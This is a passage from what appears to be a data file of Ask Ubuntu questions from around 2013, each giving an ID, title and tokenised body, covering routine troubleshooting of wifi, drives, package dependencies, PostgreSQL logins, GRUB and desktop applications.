deb-src http : //archive.canonical.com/ saucy partner deb-src http : //extras.ubuntu.com/ubuntu saucy main
413473	wifi does n't work on ubuntu 13.10 in asus u32u laptop	i 'd installed ubuntu 12.04 but i could have the wireless adapter working during the install assistant , but when i started the first time appears the message wireless adapter connection closed . so i 've decide to go to 13.10 , after so many attempts to make it work , but the problem with 13.10 it 's still the same i get this message when i use rfkill command : 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : phy1 : wireless lan soft blocked : no hard blocked : yes the command rfkill does n't do anything . i try to press the fn + f2 buttons but only works the first time . and appears the option activate wireless in the connection manager . but if i press the option with the mouse either with the function keys it change again to hard blocked . i 'll tried also changing the configuration file for my driver card which uses the ath9k driver . adding this line : options ath9k bt_coex_active=0 thank you .
413478	network manager does n't appear under the tray on ubuntu13.10	nm-applet does n't appear in tray despite it marked in startup applications contents of nm-applet.desktop ( /etc/xdg/autostart/nm-applet.desktop ) [ desktop entry ] name=network comment=manage your network connections icon=nm-device-wireless exec=nm-applet terminal=false type=application nodisplay=false notshowin=kde ; x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=networkmanager x-gnome-bugzilla-component=nm-applet x-gnome-autostart-enabled=true autostartcondition=gnome3 unless-session gnome x-gnome-usesnotifications=true x-ubuntu-gettext-domain=nm-applet
413479	is grub2 the 1.99 version of grub ?	as the title . sorry for the confusing question . the reason why i ask this , is that when you update systemd , there are two ways of setting up the grub list , one is for grub classic , one is for grub2 . i am not sure the digit 2 in grub2 is a version number or the software name is called grub2 . if grub version 1.99 is not grub2 but grub , how can you update to grub2 ( under ubuntu 12.04 ) ?
413482	uml in ubuntu 13.10 ?	so i want start uml with my ubuntu 13.10 . please i need help what i need first to start on ubuntu to make uml ? tools and utilities i needed to learn and develop both in ubuntu platform .
413486	external drive not detected	i just installed ubuntu 13.10 . when i plug in my external hard drive to access my files , it is not detected . i have no such problem when i was using windows 7. is there any solution to this kind of problem ? any help would be helpful : ) $ dmesg usb 1-5 : new high-speed usb device number 2 using ehci-pci usb 1-5 : new usb device found , idvendor=152d , idproduct=2339 usb 1-5 : new usb device strings : mfr=1 , product=2 , serialnumber=5 usb 1-5 : product : usb to ata/atapi bridge usb 1-5 : manufacturer : jmicron usb 1-5 : serialnumber : 152d203380b6 usb-storage 1-5:1.0 : usb mass storage device detected scsi2 : usb-storage 1-5:1.0 usbcore : registered new interface driver usb-storage usb 1-5 : reset high-speed usb device number 2 using ehci-pci usb 1-5 : reset high-speed usb device number 2 using ehci-pci $ sudo fdisk -l disk /dev/sda : 60.0 gb , 60011642880 bytes 255 heads , 63 sectors/track , 7296 cylinders , total 117210240 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002cef9 device boot start end blocks id system /dev/sda1 * 2048 113035263 56516608 83 linux /dev/sda2 113037310 117209087 2085889 5 extended /dev/sda5 113037312 117209087 2085888 82 linux swap / solaris
413487	what are good alternatives to tumbler ?	it has been a month since i switched to xubuntu and tumbler always makes my life harder : killing tumblerd just for ejecting external storages , and making my computer slow enough to become unusable . what 's worse is that i did n't even see one thumbnail during that one month . i purged tumbler and i have no idea what to replace it with . i could live without a thumbnailing program but it would really help because i have a lot of videos and images . so , are there any lightweight thumbnailing programs ?
413488	why does the fan stop after opening gnome-system-monitor ?	i have recently noticed a very strange effect when working in ubuntu 13.10 . i 've always had a loud fan and i found it very irritating . it turns on loud even when the system temperature is relatively low . to try to fix this , i tried to control the fan speeds through lm-sensors but i do n't think my fans have that capability because it completely ignored them . however , i have recently stumbled upon a way to stop the fans from working , by opening gnome-system-monitor . every time the fan is running on loud and it should n't be i just open gnome-system-monitor and it fixes it . does anyone know why this is happening ?
413490	shotwell photos lose edits when files are missing	i have my photos stored on my desktop computer , using shotwell . i recently went on an extended holiday and wanted to take my laptop to edit and organise photos with shotwell , so i copied all the photos to an external disk and copied across the shotwell database to my laptop . with appropriate symlinks , this all worked fine . shotwell though nothing had changed . i also made a backup of the database at this point . i then thought that i might as well import new photos to my laptop 's internal hard drive to save me from having to lug around an external one . so i detached the external one , and when i next opened shotwell all of the photos were marked as `` missing '' . as expected . i spent several months importing new photos and tagging them and making edits , exclusively using external programs from shotwell and saving the edits as _modified.jpg . this all went just fine , i was assuming that shotwell would pick up the missing photos when i eventually reconnected the disk . to my horror , i found that this did not go quite as smoothly as i wanted . when i got home and re-attached the external disk , shotwell did re-scan the photos - but lost all of the references to my edited photos . i have filed a bug for this . i have a backup of the database which correctly has all of my edits from before i went on holidays , and i have a backup of the database with all of my new edits . is there a way to merge these to correct the missing edits ? p.s . the take-home message is : always have backups ! shotwell has a bug where the `` editable_id '' field of the records in the `` phototable '' of the sqlite database is erased when the photo goes missing . this is easily fixed by restoring the automatic photos.db.bk , but is a big issue if you continue to import and edit photos .
413491	installation via a network switch ( ethernet )	how do you install ubuntu via a network switch ( on mass ) ? do you need a certain program ? if so what and where can i get it ? i will be using ubuntu 13.10 network installer . the reason i 'm asking this is because i can not find it in the install details . in the install instructions . also will i need a machine running ubuntu or will windows work ?
413493	not exactly a question : whoopsie problems during dist-upgrade in saucy	it 's not a question but i think it can be useful ... while dist-upgrading a saucy custom dvd , i 've got an error about whoopsie : invoke-rc.d : unknown initscript , /etc/init.d/whoopsie not found . dpkg : error processing /var/cache/apt/archives/whoopsie_0.2.24.1ubuntu1_i386.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 100 invoke-rc.d : unknown initscript , /etc/init.d/whoopsie not found . ... errors were encountered while processing : /var/cache/apt/archives/whoopsie_0.2.24.1ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) investigating a little , i 've found that on my other pc , running precise , /etc/init.d/whoopsie , was a symlink : whoopsie - > /lib/init/upstart-job* while in chrooted saucy looking for /etc/init.d/whoopsie i 've got can not access /etc/init.d/whoopsie : no such file or directory so i 've created the above symlink and finally dist-upgrade worked fine . silvia
413499	how to install joomla over xampp ?	i have installed the xampp and started all the necessary task are done i have successful install of a xampp . but how do i copy now my download joomla folder like usually done in windows same thing we can do also ubuntu . so i think it 's possible but need a push > anyone can help with this it will be great help . thank you
413501	how to remove gimp logos from gimp interface ?	i 've just downloaded gimp . inside the interface i find two gimp logos - same as in gimp application icon - one in the interface and second one in the toolbox . its kind of annoying and i want to remove it . so is there 's any way to remove it ?
413502	using ibus on `` standard '' account	i want to set up a `` standard '' ( non-admin ) account on my machine . everything works fine when the account is an admin account , but ibus fails to load when i downgrade the account to a standard account . how can i fix this ?
413507	how to establish dsl connection via terminal	i 've created a dsl connection . now i want to established this connection via terminal . how i can do it ?
413508	how to install shumway in ubuntu 12.04 and firefox 26/nightly for watching videos in youtube ?	i am desperately trying to install shumway in firefox 26/nightly with ubuntu 12.04 running , but it does n't work with youtube . what i tried so far : purging every flash package and getting the plugin using the shumway homepage . trying to combine lightspark with shumway plugin adding stuff to about : config as suggesting under shumway hp / configuring the extension . the `` testsites '' suggest and/or run by shumway developers are working fine and i have this plugin up and running on another pc ( works there with youtube ) . so , yeah , no idea what i could do . can anybody help ?
413511	virtualbox and kvm beside each other	i have a kvm virtual run on my machine . i tried a while ago to install virtualbox..anyway i did it and install bu when i tried to start the machine i got the error : verr_vmx_in_vmx_root_mode i googled it and the problem that kvm is already installed . i know that i can switch between them by removing some modules then use vbox . but my question is how to make them work together ? !
413513	problem with losing internet connection in 13.10	i just got ubuntu 13.10 . it works just fine , but the internet connection gets interrupted every so often when i try to load a page from any given websites ( after being connected for maybe 10 or 15 minutes ) . it 's searching and then i get an message saying that i have a problem with my internet connection , thus wo n't open anything . i have to restart my computer every time to refresh it . the wireless connection shows it 's working , so what could be the problem here ?
413514	how much memory do i use exactly and how can i optimize it ?	i installed and i configured virtualmin on my 2gb ram , 40 gb ssd , 2cpu vps . i currently have 5 virtual hosts ( 5 domains hosted ) . on three of them there are no files uploaded , so just two websites are working actually . on the virtualmin admin i see some info related to memory , but in the terminal it looks different . does it looks ok to you guys ? what should i do in order to optimize everything and lower memory usage ? related to swap ( virtual memory ) , when is this going to be used ?
413515	witch one to download for my pc ?	hello i want to instal lubuntu in my old pc amd64 processor with 255mb ram and hard drive 57gb i found this two link for my pc https : //help.ubuntu.com/community/lubuntu/alternate_iso http : //lubuntu.net/ witch one link sould i download and if it is from the secont link [ download lubuntu ( intel x86 ) desktop cd ] i download this or [ download lubuntu 64-bit ( amd64 ) desktop cd ] this ? and for instal i need internet conection ?
413517	how do i format my 24gb ssd for ubuntu ?	i have an asus ultrabook s400ca-db51t and i want to replace windows 8 with ubuntu . no dual boots or anything like that , just 100 % ubuntu . i 'm trying to make the conversion with the 13.10 image , but i 'm running into some issues . the automatic installation tool does n't seem to recognize the 24gb ssd where windows 8 is installed - just the 500gb data hdd . when i go into the something else option to manually configure the installation myself , i 'm hit with about 6 partitions in the 500gb hdd and 2 in the ssd . that kind of blows my mind since it 's a brand new laptop , but i figured they were all recovery partitions and other stuff that i did n't need anymore . so i deleted all of the partitions , but i 'm not sure how to now format the two drives . my instinct was to format the hdd as ext4 pointing to / , and the ssd as ext4 pointing to /boot , but i 'm getting the following message : the partition table format in use on your disks normally requires you to create a separate partition for boot loader code . this partition should be marked for use as an `` efi boot partition '' and should be at least 35 mb in size . note that this is not the same as a partition mounted on /boot . and i 'm not sure how to really progress from here . i do n't know what a reserved bios boot area is , and where that partition should go . any help would be much appreciated , thanks guys .
413518	dvd/cd drive not working - ubuntu 13.10	i have an hp/compaq 615 laptop with a built-in cd/dvd-rw drive . in the past , i have had no problems using the drive to read and/or write cd 's and dvd 's . however , for the first time in about a year , i have tried using the drive , and nothing . i can not get vlc to play a cd in the drive , and i can not even get ubuntu to see a dvd or cd in the drive . i am running ubuntu 13.10 . here are the results of running sudo lshw -sanitize -c disk : *-disk description : ata disk product : wdc wd1600bekt-6 vendor : western digital physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 12.0 serial : [ removed ] size : 149gib ( 160gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=0005d56e *-cdrom description : dvd-ram writer product : cddvdw ts-l633n vendor : hp physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 0300 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc here are the results of running dmesg | grep -a8 cd-rom : [ 2.620665 ] scsi 1:0:0:0 : cd-rom hp cddvdw ts-l633n 0300 pq : 0 ansi : 5 [ 2.626000 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.626003 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.626153 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 2.626233 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 [ 2.634962 ] sda : sda1 sda2 < sda5 > [ 2.635517 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 2.658784 ] usb 2-2 : new usb device found , idvendor=04f2 , idproduct=b159 [ 2.658791 ] usb 2-2 : new usb device strings : mfr=2 , product=1 , serialnumber=3 [ 2.658794 ] usb 2-2 : product : cnf8243 [ 2.658797 ] usb 2-2 : manufacturer : chicony electronics co. , ltd. [ 2.658799 ] usb 2-2 : serialnumber : sn0001 the eject command works perfectly , but i can not actually use any media put in the drive . i can not see , read or write disks . any help would be greatly appreciated .
413520	scan for new wireless networks continuously in adhoc mode	i have two laptops in an ad-hoc mode ( with same essid , broadcast id , etc. ) . sometimes , they do n't ping each other even though they are next to each other . i always have to initiate a scan from each of those using sudo iwlist , then again try to ping from one computer to another to see if the connection between them works . i want my laptop to continuously scan for new wireless networks in a area ( as one more laptop might enter this network ) . i 'm not sure if this ( scanning ) occurs continuously or not . i 'm running : $ sudo iwlist wlan0 scan every few seconds to do this . i know i can write a shell script to do this continuously . i was wondering if there was a easier way of making my wireless card continuously scan for changes in list of wireless networks .
413521	can somebody run me through a clean install of 13.10 ?	i 'm running 12.04 right now . i did n't keep windows on my computer . and i want to put it on an hp pavilion g6 laptop . somebody guided me through it last time . i remember having to update repositories and a couple other things after the install , but i ca n't remember , and i ca n't find a site that explains it thoroughly .
413522	publishing to web from shotwell in xfce	there are similar questions on this site but none of them answers mine . i have xubuntu 13.10 with shotwell installed from ubuntu repository . i also installed `` gnome online accounts '' and `` signon '' but still ca n't publish to any website from shotwell . when i click on the `` publish '' icon , a dialog appears with a few choices like piwigo , tumblr , etc but none of them works . is there anything else i have to install ? thanks . update : i tried to install shotwell from ppa but i got this error : dpkg : error processing /var/cache/apt/archives/shotwell_0.15.1-1~saucy1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/shotwell/ui/collection.ui ' , which is also in package shotwell-common 0.15.0-0ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/shotwell_0.15.1-1~saucy1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
413523	my sign image replaces with replier 's on evolution	i am using evolution as email client software on ubuntu13 . today i 've realized this ; i 've sent a mail with my sign ( which inludes my company logo ) then my recepient has replied that with an answer . when i 've scrolled down i saw that shockingly my company logo has been changed with my recepient 's company logo ; how can it be happen ? i 've checked my iphone also , result seems same in that too ... any suggestions ? all the best , ege .
413526	ubuntu 12.04 lts server nodes crashing	when running hadoop on a 16-cluster node , of ubuntu 12.04 lts servers , some of the nodes crash/take too long to respond . checking the network speed with iperf i get speeds of around 6 gbits/sec . however , in the reduce phase of hadoop , i get speeds around 0.3 mbits/sec . screenshots of the crashed nodes and more hadoop-specific details can be found here . two of these lines , which i think are most imporatant are : kernel panic - not syncing : fatal exception in interrupt pid : 2204 , comm : java tainted : g d 3.2.0-57-generic # 87-ubuntu
413528	how can i install ubuntu on lenovo g580 ideapad ?	my laptop is a lenovo g580 ideapad . specs : processor intel core i7 3632qm cpu @ 2.20 ghz installed memory ( ram ) 8.00 gb ( 7.87 gb usable ) system type 64-bit operating system , x64-based processor the gpu is nividia g610m . how can i install ubuntu on this laptop ?
413529	delete files older than one year on linux	by the time many files are still on my system and i do n't need them so how to delete all files that are one year old at least .
413530	libwebkitgtk-1.0-0 package	in my software i am using libwebkitgtk-1.0-0 package , which is necessary for proper running of my software . i had this package installed on all my laptops . but when i tried to install the software on another laptop where this package was not present , my software was not running properly . then i installed the package . i am giving this software to some of my friends who will use it daily . 1-2 of them are from remote areas where they hardly get internet . so i thought that i will provide this package separately . but i could not get it . can anybody tell me how to resolve this issue ? where can i get the libwebkitgtk-1.0-0 so that i can provide it within the cd ?
413534	installing gcc-4.8.2	i have downloaded gcc 4.8.2.tar.gz , i have also installed mpc , gmp , mpr packages . but still i am unable to install these compilers . while make file it gives me error configure : error : source directory already configured ; run `` make distclean '' there first i urgently need help since.i want to run maths programs in fortran for my mac . thanks .
413535	sudo apt-get install is giving me strange results	i was trying to install code blocks ! this is what it gives me after sudo apt-get install libwxgtk2.8-dev reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : codeblocks : i386 : depends : libatk1.0-0 : i386 ( > = 1.12.4 ) but it is not going to be installed depends : libc6 : i386 ( > = 2.4 ) but it is not going to be installed depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not going to be installed depends : libfontconfig1 : i386 ( > = 2.9.0 ) but it is not going to be installed depends : libfreetype6 : i386 ( > = 2.2.1 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libgdk-pixbuf2.0-0 : i386 ( > = 2.22.0 ) but it is not going to be installed depends : libglib2.0-0 : i386 ( > = 2.12.0 ) but it is not going to be installed depends : libgtk2.0-0 : i386 ( > = 2.8.0 ) but it is not going to be installed depends : libpango1.0-0 : i386 ( > = 1.14.0 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.6 ) but it is not going to be installed depends : libwxbase2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : codeblocks-common : i386 ( = 13.12-1 ) but it is not installable recommends : gcc : i386 but it is not going to be installed or g++ : i386 but it is not going to be installed recommends : gdb : i386 but it is not going to be installed codeblocks-contrib : i386 : depends : libatk1.0-0 : i386 ( > = 1.12.4 ) but it is not going to be installed depends : libbz2-1.0 : i386 but it is not going to be installed depends : libc6 : i386 ( > = 2.4 ) but it is not going to be installed depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not going to be installed depends : libfontconfig1 : i386 ( > = 2.9.0 ) but it is not going to be installed depends : libfreetype6 : i386 ( > = 2.2.1 ) but it is not going to be installed depends : libgamin0 : i386 but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libgdk-pixbuf2.0-0 : i386 ( > = 2.22.0 ) but it is not going to be installed depends : libglib2.0-0 : i386 ( > = 2.12.0 ) but it is not going to be installed depends : libgtk2.0-0 : i386 ( > = 2.8.0 ) but it is not going to be installed depends : libhunspell-1.3-0 : i386 but it is not going to be installed depends : libpango1.0-0 : i386 ( > = 1.14.0 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.6 ) but it is not going to be installed depends : libwxbase2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : libx11-6 : i386 but it is not going to be installed depends : zlib1g : i386 ( > = 1:1.2.3.3 ) but it is not going to be installed depends : codeblocks-contrib-common : i386 ( = 13.12-1 ) but it is not installable recommends : valgrind : i386 but it is not going to be installed recommends : cppcheck : i386 but it is not going to be installed recommends : cscope : i386 but it is not going to be installed recommends : cccc : i386 but it is not going to be installed codeblocks-dev : i386 : depends : codeblocks-headers : i386 ( = 13.12-1 ) but it is not installable codeblocks-headers : depends : codeblocks-dev ( > = 13.12-1 ) but it is not going to be installed depends : codeblocks-dev ( < 13.12-1.1~ ) but it is not going to be installed codeblocks-libwxcontrib0 : i386 : depends : libc6 : i386 ( > = 2.3.6-6~ ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.1.1 ) but it is not going to be installed depends : libwxbase2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : binutils : i386 ( > = 2.14.90.0.7 ) but it is not going to be installed codeblocks-wxcontrib-headers : depends : codeblocks-wxcontrib-dev ( > = 13.12-1 ) but it is not installable depends : codeblocks-wxcontrib-dev ( < 13.12-1.1~ ) but it is not installable libcodeblocks0 : i386 : depends : libc6 : i386 ( > = 2.11 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.6 ) but it is not going to be installed depends : libwxbase2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : binutils : i386 ( > = 2.14.90.0.7 ) but it is not going to be installed libwxgtk2.8-dev : depends : wx-common but it is not going to be installed depends : wx2.8-headers ( = 2.8.12.1-14ubuntu1.1 ) but it is not going to be installed depends : libwxgtk2.8-0 ( = 2.8.12.1-14ubuntu1.1 ) but it is not going to be installed depends : libwxbase2.8-dev ( = 2.8.12.1-14ubuntu1.1 ) but it is not going to be installed libwxsmithlib0 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.1.1 ) but it is not going to be installed depends : libwxbase2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.12.1 ) but it is not going to be installed wxsmith-headers : depends : wxsmith-dev ( > = 13.12-1 ) but it is not installable depends : wxsmith-dev ( < 13.12-1.1~ ) but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . they are not correct also it gives me this for every single package and it happens after i try to get build essentials ! edit : it still gives me this for code blocks searched whole net for unmet dependies ! none worked ! theres still 2 other dependies that nothing can fix ! libgcc1 ( > =1:4.1.1 ) but 1:4.8.1-10ubuntu9 is to be isntalled codeblocks-common ( =12.11-3 ) but 13.12-1 is to be installed â i tried re installing i guess ! auto remove didnt work ! edit : i tried -f isntall again to post results here is results somepackages use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 240 not upgraded . i still ca n't install code : blocks 2dependies
413537	how to connect to teamviewer instance ( on windows xp ) without installing it on my machine ?	i would like to use any open source client . would that work ?
413538	mystery music plays for 20 seconds and then stops	mystery music starts playing for around 20 seconds ( sound like eric clapton & cream ) while i 'm on e-bay then stops.plays every so often and stops . why is this ? and where did it come from ? how do i get it to stop ? thanks for your help -- bob
413539	resizing arm ubuntu desktop to fit screen	well , i am a new member and i have never used ubuntu before . yesterday , my mele a1000g single core mini pc arrived in the mail . i tried to use berryboot to install ubuntu , but it did n't work . so , i dd 'd the image of arm ubuntu specific for my device to an sd card . i used the sd card to transfer that image to the nand partition and can now boot ubuntu without the sd card . anyway , it boots quickly , but i can not see the entire desktop . i can see a sliver of the menu , but none of the text or anything and i have no idea what i am doing . for the most part , all that i can see is the ubuntu icon in the center of the screen on a black backround . i am used to windows 7 . so , i would like some way to resize the desktop slightly smaller so that i can see the entire thing . i have tried changing the display mode on my monitor , but it only resizes the image that it was originally displaying and it does n't add any more of the edges of the desktop that were n't being displayed . so , that is a useless idea . i would prefer some sort of graphical way of doing this , as i ca n't do much of anything in the text only environment except typing `` startx '' and booting ubuntu . keep in mind that this is arm ubuntu 12.10 running on the mele a1000g single core . i am using the image from this link : http : //www.guillaumeplayground.net/mele-a2000-ubuntu-12-10-armhf-nand-xbmc/ also , some users of my device have had trouble accessing all of their ram when booting with this image . for some reason ubuntu only recognizes 512 mb of the 1 gb ram that this device has . i would like a quick way to check how much ram ubuntu is running on/able to access . last question : ) does ubuntu come with a web browser and how do i find and run it ? if not , how would i go about installing one ? thanks so much for all of your help ! keep in mind that i am a complete beginner .
413542	how to use vlc with sudo privileges ?	i 'm trying to use vlc with sudo but it does n't work . this is the error : vlc is not supposed to be run as root . sorry . if you need to use real-time priorities and/or privileged tcp ports you can use vlc-wrapper ( make sure it is set-uid root and can not be run by non-trusted users first ) . can you help me here ?
413544	help interpreting ssd state	unknown @ unknown-z96s : ~ $ sudo smartctl -a /dev/sdb gives me : mart attributes data structure revision number : 10 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 5 reallocated_sector_ct 0x0032 100 100 000 old_age always - 0 9 power_on_hours 0x0032 000 000 000 old_age always - 29102699295398 12 power_cycle_count 0x0032 099 099 000 old_age always - 1250 181 program_fail_cnt_total 0x0032 000 000 000 old_age always - 0 182 erase_fail_count_total 0x0032 000 000 000 old_age always - 0 192 power-off_retract_count 0x0032 100 100 000 old_age always - 1249 225 load_cycle_count 0x0032 100 100 000 old_age always - 26627 232 available_reservd_space 0x0033 100 100 010 pre-fail always - 0 233 media_wearout_indicator 0x0032 100 100 000 old_age always - 0 241 total_lbas_written 0x0032 100 100 000 old_age always - 26627 242 total_lbas_read 0x0032 100 100 000 old_age always - 29251 249 unknown_attribute 0x0013 100 100 000 pre-fail always - 1316 i expected to see something like 15000 in power_on_hours instead of 29102699295398. and media_wearout_indicator gives 0. so 0 % remaining of ssd life ? ! ? is this data full of errors ? and how can i get normal ssd readings ?
413549	ubuntu 12.04 in sony vaio vgn-fz21m - graphics	i have just downloaded and installed ubuntu 12.04 in my old sony vaio vgn-fz21m . on the first boot i did the update & & upgrade and i notice that there was a notification icon on the top right corner saying that a nvidia driver was installed ( although not sill activated . after that i did the upgrades indicated in the upgrade manager window . after this upgrades i was asked to reboot my laptop . the laptop booted with the new nvidia driver activated and the definition was just fine . i checked with the command : `` sudo lshw -c video `` and the driver in use was nvivia ( driver=nvivia ) . the problem came after a second reboot . now it appears that the driver wont load and i have a bad display definition . maybe now i am using some integrated graphics card ? i have searched this forum , and others , but did not get the answer to how to solve this . now when i run `` sudo lshw -c video `` i have no indication of driver=nvidia the output of `` lspci |grep vga '' is nvivia corporation g86m [ geforce 8400m gt ] ( rev a1 ) one thing did notice was that at the boot that went fine , before i got the colored screen , i could see a couple of messages related to `` uvc video probe control '' . now i do n't see this messages anymore when booting . is this related ? can you help ? should you need any other info , or output , just let me know . thank you .
413551	want to access work computer : ssh and gui or vnc	the title says it all : i have a workstation at work ( ubuntu 12.04 lts ) and i want to access it from my home laptop ( also running ubuntu 12.04 lts ) . i already do it via ssh , but would now like a gui . do people recommend i use vnc or ssh with a gui ?
413555	is there a cross-platform file type system that works on mac , w $ and ubuntu ?	the title says it all . i have a drive i will be accessing from mac , windows and ubuntu . though i only use ubuntu , several of my family members did not convert yet and i need them to be able to access the hard drive . i am going to use truecrypt to protect the data on the drive in case of theft . i know ntfs and fat32 are cross-platform . should i use these ? or something else ?
413558	ubuntu 12.04 unable to automatically remove lvm data	! [ unable to automatically remove lvm data ] [ 1 ] i am trying to install ubuntu 12.04 via preceed config onto dell poweredge r710 . i had redhat installed on the box then i tried installing ubuntu 12.04 , then auto install popping with unable to automatically remove lvm data message . complete message : because the volume groups on the selected device also consist of physical volumes on other devices . it is not considered safe to remove its lvm data automatically . if you wish to use this device for paritioning , please remove its lvm data first . couple of blogs suggested to use this preceed option d-i partman-lvm/device_remove_lvm_span boolean true but no use , i still get the same message . also one more question : ubuntu preceed auto install on dell servers showing first disk as /dev/sdc not /dev/sda . any idea . appreciate for your answer .
413559	is there any free software to convert aurthographic projection to isometric projection ?	i need a free software to convert aurthographic projection to isometric projection . autocad softwares are too much costly that is in ubuntu software centre .
413560	ubuntu freeze after moving window to the side	when i move a window to the left or right side , it should automatically resize itself ( i do n't know how this function is called , but it is also present on windows 7 ) . my problem is , that ubuntu freeze ( all unity ) during this process , and i ca n't do anything , only force restart , or switch to another tty . what can i do ?
413563	installed 32-bit by accident , want to upgrade to 64 and keep w7	i 'm brand new to linux/ubuntu , and i have multiple flash drives with the latest release on it . last night , i mistakenly installed the 32-bit os while i intended to install the 64 bit . just before doing so , i took an image of windows 7 64 in case something went wrong . i want to upgrade to 64 bit version of ubuntu while keeping w7 64 . is there a way for me to easily do this ? if i use my 64 bit live disk , will the 64 bit version overwrite the 32 bit ? alternatively , could i just recover the pc from the image i took before installing ubuntu , wiping everything clean including 32-bit ubuntu ( then install 64 ) ? or will the w7 recovery ignore ubuntu all together ? thanks all !
413567	is there any way to find something in byobu window ?	is there a way to find an expression ( ctrl-f like command ) inside a byobu window ?
413569	what 's the lightest ubuntu desktop environment ?	my computer has 1gb ram and a very low graphic card , but i do n't know how much powerful it is . my computer is very slow with ubuntu unity and i saw that there are many desktop environments which are much faster , even for a slow computer . so , what 's the lightest desktop environment .
413571	software updates for 13.04	i am running 13.04 . i opened software updater . it started ok and then came up with the following message : `` software updates are no longer provided for ubuntu 13.04 `` followed by `` to stay secure , you should upgrade to ubuntu 13.10 '' is this an error ? what is happening ? please can someone explain what is going on . i have never had this in any previous edition of ubuntu and it has always been possible to run and update a system two releases back , let alone lts versions .
413579	deluge ( daemon ) + webui + autoadd `` multiple watchdir '' plugins	i have a configuration problem with the plugin and autoadd option . i have set up my file manually autoadd.conf to use the `` multiple watchdir '' . i have no gui on ubuntu server and plugins has no graphical management via deluge webui either . i do not know what to do there yet .. it may be a manual change made ââin core.conf , i 've looked but i do not see how . can you help me or give my a way to bypass the original setting of autoadd on the deluge webui settings ? regards
413585	postgres password authentication fails	i 've installed postgresql 9.1 and pgadmin3 on ubuntu server 13.10 . i configured postgresql.conf with : listen_addresses = '*' also i configured ph_hba.conf by changed peer connections to md5 plus i reset the password of postgres by : sudo password postgres then restarted the service with sudo /etc/init.d/postgresql restart after that i tried to connect to the default postgresql template database : sudo -u postgres psql template1 but login failed with this error message : psql : fatal : password authentication failed for user `` postgres '' then i tried to login from the pgadmin , which gave me the same error . i 've read here that it might be a password expiry dates bug postgresql user can not connect to server after changing password but i could n't solve it coz i can not login with psql . does anyone now how to resolve this issue ? edit ph_hba file : here screenshot :
413590	libreoffice constantly crashing under 13.10	having rather serious issues with libreoffice ( v4.1.3.2 ) at the moment . this seems to have happened ever since upgrading from 13.04 to 13.10 - for whatever reason , a variety of different things are causing it to crash out . the two main triggers that cause a crash are : opening a file of the same type as initially started in ( e.g . opening a .odt file if i 've started in writer mode , a .ods file in calc or a .odp file in impress ) . cross extensions ( e.g . starting in calc , and opening a .odp to switch to impress ) are fine . once one file is open , however , i can open as many as i like of any type on top of it . closing any libreoffice window will cause all of them to crash ( it will come up with a recovery dialog for any file that was open ) . i 've seen other causes too ( even opening the save as dialog has done it a couple of times ) but these are not as consistent . i do n't get any kind of error report dialog like i normally would ; i think it must have auto-checked `` do n't show me these '' at some point so i 'm not getting the error dumps any more . i have no idea what 's causing this , but i 'd very much like to fix it if possible . i 've tried fully reinstalling libreoffice ( sudo apt-get purge libreoffice* , followed by sudo apt-get install libreoffice ) , but to no avail - it continues to crash without fail whenever i perform one of the triggers above ( not exactly uncommon actions ) . any help would be much appreciated . edit : i have also tried running from a terminal , using libreoffice -- writer etc. , but get no additional outputs or error messages that would help . i only know that it 's crashing on close because it opens the recovery manager the next time i start it ( even if there was only a single , blank document open , it will do this on close ) edit # 2 : i am still completely stuck with this . i have tried the command listed in reinstall package and its installed dependencies to reinstall all of the dependencies , as well as purging entirely and installing from the ppa 